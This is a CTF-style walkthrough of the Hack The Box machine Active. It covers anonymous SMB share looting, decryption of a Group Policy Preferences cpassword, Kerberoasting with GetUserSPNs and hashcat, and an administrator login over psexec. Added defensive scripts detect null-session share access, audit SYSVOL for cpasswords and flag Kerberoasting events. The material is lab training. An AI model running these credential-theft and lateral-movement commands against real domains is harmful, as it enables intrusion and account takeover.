Hack the Box Active (OSCP like boxes and beyond)

Ryan Yager
Published in System Weakness
3 min read, Oct 9, 2023

Today we will be looking at the retired HTB machine Active, which is an Active Directory machine. It is listed in the "Beyond this Module" section of the Hack The Box Academy module Active Directory Enumeration and Attacks. Starting off as usual with a port scan, we see the following:

rustscan --ulimit 5000 -a 10.10.10.100 -- -Pn

Enumerating SMB we see the following:

smbclient -L "\\\\10.10.10.100\\"

We can also use netexec (nxc), which is the successor to CrackMapExec:

nxc smb 10.10.10.100 -u '' -p '' --shares

We have read permission on the Replication share. Let's go into that share and pull down everything we can.

The following commands were used (only do this if you actually want to download everything in the share):

smbclient "\\\\10.10.10.100\\Replication"
recurse on
prompt off
mget *
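From the defender's side, the interesting question is how the anonymous read of Replication would show up on the domain controller. The following is an added example, not part of the original post: it runs over a few constructed Windows Security event 5140 records ("A network share object was accessed"; Detailed File Share auditing must be enabled for these to be logged) and reports null-session reads of any share other than IPC$. Field names follow the 5140 EventData schema; the IP addresses and share names are constructed for the example.

```python
"""Flag null-session (ANONYMOUS LOGON) access to non-IPC$ SMB shares in
Windows Security event 5140 records.

Added example from a defender's point of view; not part of the original post.
The events below are constructed; field names follow the 5140 EventData
schema (SubjectUserName, SubjectDomainName, ShareName, IpAddress, AccessMask).
"""

# Constructed sample: an anonymous session touching IPC$ (normal noise) and the
# Replication share (the finding), plus two authenticated accesses for contrast.
SAMPLE_5140 = [
    {"SubjectUserName": "ANONYMOUS LOGON", "SubjectDomainName": "NT AUTHORITY",
     "ShareName": "\\\\*\\IPC$", "IpAddress": "10.10.14.5", "AccessMask": "0x1"},
    {"SubjectUserName": "ANONYMOUS LOGON", "SubjectDomainName": "NT AUTHORITY",
     "ShareName": "\\\\*\\Replication", "IpAddress": "10.10.14.5", "AccessMask": "0x1"},
    {"SubjectUserName": "svc_tgs", "SubjectDomainName": "ACTIVE",
     "ShareName": "\\\\*\\Users", "IpAddress": "10.10.14.5", "AccessMask": "0x1"},
    {"SubjectUserName": "DC$", "SubjectDomainName": "ACTIVE",
     "ShareName": "\\\\*\\SYSVOL", "IpAddress": "10.10.10.100", "AccessMask": "0x1"},
]


def share_name(event):
    """Reduce the logged ShareName (e.g. \\\\*\\Replication) to its last component."""
    return event["ShareName"].rsplit("\\", 1)[-1]


def anonymous_share_access(events):
    """Return {(client_ip, share): count} for null-session reads of shares other than IPC$.

    IPC$ is skipped because anonymous connections to it are routine on a DC;
    anonymous access to a data share is what should not happen.
    """
    hits = {}
    for ev in events:
        if ev["SubjectUserName"].upper() != "ANONYMOUS LOGON":
            continue
        share = share_name(ev)
        if share.upper() == "IPC$":
            continue
        key = (ev["IpAddress"], share)
        hits[key] = hits.get(key, 0) + 1
    return hits


if __name__ == "__main__":
    for (ip, share), count in anonymous_share_access(SAMPLE_5140).items():
        print(f"anonymous read of share {share!r} from {ip} ({count} event(s))")
```

On a real DC the same check can be fed from the exported Security log. The fix is the share ACL: a data share should never grant Everyone or Anonymous read, and "Network access: Shares that can be accessed anonymously" should stay empty.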

Instead of looking through every folder, I first looked for "password" but couldn't find anything, so I then looked for "user" and found the following:

grep -rwi "user"

Looks like we have a cpassword (a Group Policy Preferences password); let's decrypt it:

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
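The reason gpp-decrypt works is that every cpassword in SYSVOL is encrypted with one published AES key, so the real remediation is to find and delete the preference items that still carry one (Microsoft stopped writing them with MS14-025 / KB2962486, but old files stay in SYSVOL until someone removes them). The script below is an added example from a defender's point of view, not part of the original post: it walks a copied share or SYSVOL tree, reports every GPP XML item with a non-empty cpassword, and never decrypts anything. The sample policy tree it builds is constructed in a temp directory; the policy GUIDs and the blob value are placeholders, not values from the box.

```python
"""Audit a copied share or SYSVOL tree for Group Policy Preference (GPP) XML
files that still carry a cpassword attribute.

Added example from a defender's point of view; not part of the original post.
It reports where credentials are embedded but never decrypts them. The sample
policy tree is constructed inside a temp directory; the policy GUIDs and the
cpassword blob are placeholders.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP XML files whose <Properties> element may carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attribute naming the account the stored password belongs to, per file type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def find_cpasswords(root_dir):
    """Walk root_dir and return one finding per element with a non-empty cpassword.

    A finding holds the file, the preference item type (User, NTService, Task, ...),
    the account it applies to and the length of the encoded blob. The blob itself
    is deliberately not returned: the remediation is to delete the item and reset
    the password, not to read it.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root_dir):
        for name in filenames:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # not well-formed XML; skip rather than abort the audit
            parent_of = {child: parent for parent in root.iter() for child in parent}
            for elem in root.iter():
                blob = elem.get("cpassword")
                if not blob:
                    continue
                account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
                item = parent_of.get(elem, elem).tag  # e.g. "User" for Groups.xml
                findings.append({"file": path, "item": item,
                                 "account": account, "cpassword_len": len(blob)})
    return findings


def build_sample_tree():
    """Create a constructed Policies/ tree: one Groups.xml with a cpassword, one without."""
    base = tempfile.mkdtemp(prefix="gpp-audit-")
    leaky_dir = os.path.join(base, "Policies", "{00000000-0000-0000-0000-000000000000}",
                             "MACHINE", "Preferences", "Groups")
    clean_dir = os.path.join(base, "Policies", "{11111111-1111-1111-1111-111111111111}",
                             "MACHINE", "Preferences", "Groups")
    os.makedirs(leaky_dir)
    os.makedirs(clean_dir)
    leaky = ('<?xml version="1.0" encoding="utf-8"?>\n'
             '<Groups><User name="active.htb\\SVC_TGS">'
             '<Properties action="U" cpassword="CONSTRUCTED-PLACEHOLDER-BLOB=" '
             'userName="active.htb\\SVC_TGS"/></User></Groups>')
    clean = leaky.replace(' cpassword="CONSTRUCTED-PLACEHOLDER-BLOB="', "")
    with open(os.path.join(leaky_dir, "Groups.xml"), "w") as fh:
        fh.write(leaky)
    with open(os.path.join(clean_dir, "Groups.xml"), "w") as fh:
        fh.write(clean)
    return base


if __name__ == "__main__":
    for f in find_cpasswords(build_sample_tree()):
        print(f"{f['file']}: {f['item']} item for {f['account']} "
              f"carries a {f['cpassword_len']}-char cpassword")
```

Point it at the directory you pulled with mget (or at \\dc\SYSVOL\domain\Policies on the DC itself); any hit means that account's password must be reset as well, because anyone with read access to SYSVOL has had it.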

Now we have the user SVC_TGS and a password. Let's use CrackEverything. Remember, if you are using netexec use this version: https://github.com/overgrowncarrot1/NetEverything./blob/main/NetExecEverything.py, and if you are using CrackMapExec version 6, this one: https://github.com/overgrowncarrot1/CrackEverything6/blob/main/CrackEverything6.py. If you are still on version 5, watch here to learn how to upgrade to netexec: https://youtu.be/nDBKRCQzy-0.

CrackEverything.py -u svc_tgs -p GPPs***** -r 10.10.10.100 -J -Z Shell!

Remember, if you have never changed your .conf file, your -Z value will be different, e.g. -Z Pwn3d!

Looks like we didn't get a Shell! anywhere; however, we can read more shares:

CrackEverything.py -u svc_tgs -p GPPs***** -r 10.10.10.100 -Z Shell!

Notice above that we removed the -J.

Now let's put active.htb into /etc/hosts:

From here we can check whether any accounts have an SPN set (service accounts):

GetUserSPNs.py 'active.htb/svc_tgs:GPPs*****'

We do have one; let's request a ticket:

GetUserSPNs.py 'active.htb/svc_tgs:GPPs*****' -request

Now we can copy that into a file and try to crack it with John or Hashcat:

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --fork=4

We receive a password back:
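What just happened is a Kerberoast: any domain user can ask the KDC for a service ticket to an SPN, and if that SPN sits on a user account with a weak password the ticket cracks offline. The script below is an added example from a defender's point of view, not part of the original post: it runs over a few constructed Windows Security event 4769 records ("A Kerberos service ticket was requested") and flags two things, RC4 (0x17) service tickets for user accounts, and one client asking for tickets to several different service accounts within a short window. Field names follow the 4769 EventData schema (TargetUserName is the requester, ServiceName is the account the ticket is for); the timestamps, IPs and service names are constructed.

```python
"""Spot likely Kerberoasting in Windows Security event 4769 records.

Added example from a defender's point of view; not part of the original post.
Two signals are combined:
  * TicketEncryptionType 0x17 (RC4-HMAC) for a ticket to a user account, on a
    domain whose computers all speak AES (0x12 / 0x11), and
  * one requester (account + client IP) obtaining tickets for many distinct
    user-account SPNs inside a short window.
The events below are constructed; field names follow the 4769 EventData schema.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"

# Constructed sample: svc_tgs from 10.10.14.5 requests RC4 tickets for three
# user accounts in two seconds; alice later gets one AES ticket to a service.
SAMPLE_4769 = [
    {"time": "2023-10-09T10:00:01", "TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"time": "2023-10-09T10:00:02", "TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"time": "2023-10-09T10:00:02", "TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"time": "2023-10-09T10:00:03", "TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"time": "2023-10-09T11:30:00", "TargetUserName": "alice@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0"},
    {"time": "2023-10-09T11:31:00", "TargetUserName": "alice@ACTIVE.HTB", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0"},
]


def is_user_service(service_name):
    """True for tickets to user accounts: computer accounts end in '$', krbtgt is the TGT."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def rc4_service_ticket_requests(events):
    """Return the successful RC4 service-ticket requests aimed at user accounts."""
    return [ev for ev in events
            if ev.get("Status", "0x0") == "0x0"
            and ev["TicketEncryptionType"] == RC4_HMAC
            and is_user_service(ev["ServiceName"])]


def kerberoast_bursts(events, window=timedelta(minutes=5), threshold=3):
    """Return {(requester, ip): [services]} where one client obtained tickets for
    at least `threshold` distinct user-account SPNs within `window`."""
    by_requester = defaultdict(list)
    for ev in events:
        if ev.get("Status", "0x0") != "0x0":
            continue  # a failed request yields no ticket to crack
        if is_user_service(ev["ServiceName"]):
            by_requester[(ev["TargetUserName"], ev["IpAddress"])].append(
                (datetime.fromisoformat(ev["time"]), ev["ServiceName"]))
    flagged = {}
    for key, reqs in by_requester.items():
        reqs.sort()
        for i, (start, _svc) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= threshold:
                flagged[key] = sorted(services)
                break
    return flagged


if __name__ == "__main__":
    for ev in rc4_service_ticket_requests(SAMPLE_4769):
        print(f"RC4 ticket for {ev['ServiceName']} requested by {ev['TargetUserName']}")
    for (user, ip), services in kerberoast_bursts(SAMPLE_4769).items():
        print(f"burst from {user} at {ip}: {services}")
```

Threshold and window are tunable; on a real domain you would also whitelist accounts that legitimately talk to many services. The matching hardening is on the page's own finding: SPNs on user accounts need long random passwords or a gMSA, and setting those accounts to AES-only (msDS-SupportedEncryptionTypes) removes the cheap RC4 hash entirely. A decoy account with an SPN and no real use makes this detection nearly noise-free, since nobody should ever request a ticket to it.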

Lastly, we log in through psexec:

psexec.py '/administrator:Tick****'@10.10.10.100

I hope you all enjoyed reading this; for a video walkthrough, you can see it here:
https://youtu.be/1zmSNbCABGg